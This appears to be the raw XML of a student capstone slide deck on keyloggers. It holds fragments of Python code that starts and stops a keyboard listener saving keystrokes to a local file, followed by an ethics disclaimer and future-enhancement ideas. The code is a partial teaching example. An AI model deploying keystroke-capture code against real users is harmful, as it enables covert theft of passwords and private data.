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7353" name="Shape 2097353"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097354" name="Google Shape;2097354;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97355" name="Google Shape;2097355;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97356" name="Google Shape;2097356;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7357" name="Google Shape;2097357;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097358" name="Google Shape;2097358;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97359" name="Google Shape;2097359;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443" name="Shape 2097443"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097444" name="Google Shape;2097444;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7445" name="Google Shape;20974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503" name="Shape 2097503"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097504" name="Google Shape;2097504;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7505" name="Google Shape;209750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510" name="Shape 2097510"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097511" name="Google Shape;2097511;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7512" name="Google Shape;209751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516" name="Shape 2097516"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097517" name="Google Shape;2097517;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7518" name="Google Shape;209751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523" name="Shape 2097523"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097524" name="Google Shape;2097524;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7525" name="Google Shape;209752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529" name="Shape 2097529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097530" name="Google Shape;2097530;p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7531" name="Google Shape;209753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535" name="Shape 2097535"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097536" name="Google Shape;2097536;p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7537" name="Google Shape;209753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541" name="Shape 2097541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097542" name="Google Shape;2097542;p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7543" name="Google Shape;209754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450" name="Shape 2097450"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097451" name="Google Shape;2097451;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7452" name="Google Shape;20974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456" name="Shape 2097456"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097457" name="Google Shape;2097457;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7458" name="Google Shape;209745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462" name="Shape 2097462"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097463" name="Google Shape;2097463;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7464" name="Google Shape;209746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468" name="Shape 2097468"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097469" name="Google Shape;2097469;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7470" name="Google Shape;209747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475" name="Shape 2097475"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097476" name="Google Shape;2097476;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7477" name="Google Shape;209747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482" name="Shape 2097482"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097483" name="Google Shape;2097483;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7484" name="Google Shape;209748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489" name="Shape 2097489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097490" name="Google Shape;2097490;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7491" name="Google Shape;209749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496" name="Shape 2097496"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097497" name="Google Shape;2097497;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7498" name="Google Shape;209749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97369" name="Shape 2097369"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097370" name="Google Shape;2097370;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371" name="Google Shape;2097371;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372" name="Google Shape;2097372;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2097373" name="Google Shape;2097373;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374" name="Google Shape;2097374;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097375" name="Google Shape;2097375;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97427" name="Shape 2097427"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097428" name="Google Shape;2097428;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429" name="Google Shape;2097429;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2097430" name="Google Shape;2097430;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431" name="Google Shape;2097431;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097432" name="Google Shape;2097432;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097433" name="Shape 2097433"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097434" name="Google Shape;2097434;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435" name="Google Shape;2097435;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436" name="Google Shape;2097436;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2097437" name="Google Shape;2097437;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438" name="Google Shape;2097438;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439" name="Google Shape;2097439;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440" name="Google Shape;2097440;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441" name="Google Shape;2097441;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097442" name="Google Shape;2097442;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97376" name="Shape 2097376"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097377" name="Google Shape;2097377;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378" name="Google Shape;2097378;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2097379" name="Google Shape;2097379;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97380" name="Shape 2097380"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097381" name="Google Shape;2097381;p4"/>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382" name="Google Shape;2097382;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383" name="Google Shape;2097383;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097384" name="Google Shape;2097384;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97385" name="Shape 2097385"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097386" name="Google Shape;2097386;p5"/>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387" name="Google Shape;2097387;p5"/>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388" name="Google Shape;2097388;p5"/>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2097389" name="Google Shape;2097389;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390" name="Google Shape;2097390;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097391" name="Google Shape;2097391;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097392" name="Shape 2097392"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097393" name="Google Shape;2097393;p6"/>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394" name="Google Shape;2097394;p6"/>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2097395" name="Google Shape;2097395;p6"/>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2097396" name="Google Shape;2097396;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397" name="Google Shape;2097397;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097398" name="Google Shape;2097398;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097399" name="Shape 2097399"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097400" name="Google Shape;2097400;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401" name="Google Shape;2097401;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2097402" name="Google Shape;2097402;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2097403" name="Google Shape;2097403;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2097404" name="Google Shape;2097404;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2097405" name="Google Shape;2097405;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406" name="Google Shape;2097406;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097407" name="Google Shape;2097407;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97408" name="Shape 2097408"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097409" name="Google Shape;2097409;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410" name="Google Shape;2097410;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097411" name="Google Shape;2097411;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97412" name="Shape 2097412"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097413" name="Google Shape;2097413;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414" name="Google Shape;2097414;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415" name="Google Shape;2097415;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2097416" name="Google Shape;2097416;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2097417" name="Google Shape;2097417;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418" name="Google Shape;2097418;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097419" name="Google Shape;2097419;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097420" name="Shape 2097420"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097421" name="Google Shape;2097421;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422" name="Google Shape;2097422;p10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447817" y="641350"/>
            <a:ext cx="11290800" cy="3651300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097423" name="Google Shape;2097423;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2097424" name="Google Shape;2097424;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7425" name="Google Shape;2097425;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097426" name="Google Shape;2097426;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7360" name="Shape 2097360"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097361" name="Google Shape;2097361;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097362" name="Google Shape;2097362;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2097363" name="Google Shape;2097363;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097364" name="Google Shape;2097364;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2097365" name="Google Shape;2097365;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366" name="Google Shape;2097366;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367" name="Google Shape;2097367;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  Description automatically generated" id="2097368" name="Google Shape;2097368;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github.com/techtrainer20/TNSD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446" name="Shape 2097446"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097447" name="Google Shape;2097447;p13"/>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KEYLOGGERS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097448" name="Google Shape;2097448;p13"/>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rgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097449" name="Google Shape;2097449;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="79803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IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aishwarya.J</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="1482AB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> -Dmi College of Engineering-IT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="200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506" name="Shape 2097506"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097507" name="Google Shape;2097507;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2097508" name="Google Shape;2097508;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>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1" i="0" lang="en-IN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1840"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097509" name="Google Shape;2097509;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608200" cy="462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Define the start_keylogger function</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def start_keylogger():</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global listener</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listener = keyboard.Listener(on_press=on_press, on_release=on_release)</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listener.start()</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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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start_button.config(state='disabled')</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stop_button.config(state='normal')</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Define the stop_keylogger function</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def stop_keylogger():</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global listener</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listener.stop()</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label.config(text="Keylogger stopped.")</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start_button</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513" name="Shape 2097513"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097514" name="Google Shape;2097514;p2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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097515" name="Google Shape;2097515;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991300" cy="342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519" name="Shape 2097519"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097520" name="Google Shape;2097520;p2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pic>
        <p:nvPicPr>
          <p:cNvPr id="2097521" name="Google Shape;2097521;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487700" cy="752700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097522" name="Google Shape;2097522;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250408" cy="15634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526" name="Shape 2097526"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097527" name="Google Shape;2097527;p2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2097528" name="Google Shape;2097528;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901232" y="0"/>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lang="en-IN" sz="2000"/>
              <a:t>The development of a keylogger involves understanding operating system APIs, implementing a logging mechanism, and considering ethical and legal implications. It's crucial to use such tools responsibly and only for legitimate purposes, such as testing security systems or parental controls. Creating keyloggers for malicious activities is both illegal and unethical.</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532" name="Shape 2097532"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097533" name="Google Shape;2097533;p26"/>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b="1" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-306000" lvl="0" marL="306000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buFont typeface="Franklin Gothic"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-306000" lvl="0" marL="306000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buFont typeface="Franklin Gothic"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-306000" lvl="0" marL="306000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buFont typeface="Franklin Gothic"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-306000" lvl="0" marL="306000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
              <a:buFont typeface="Franklin Gothic"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-306000" lvl="0" marL="306000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="940"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1564"/>
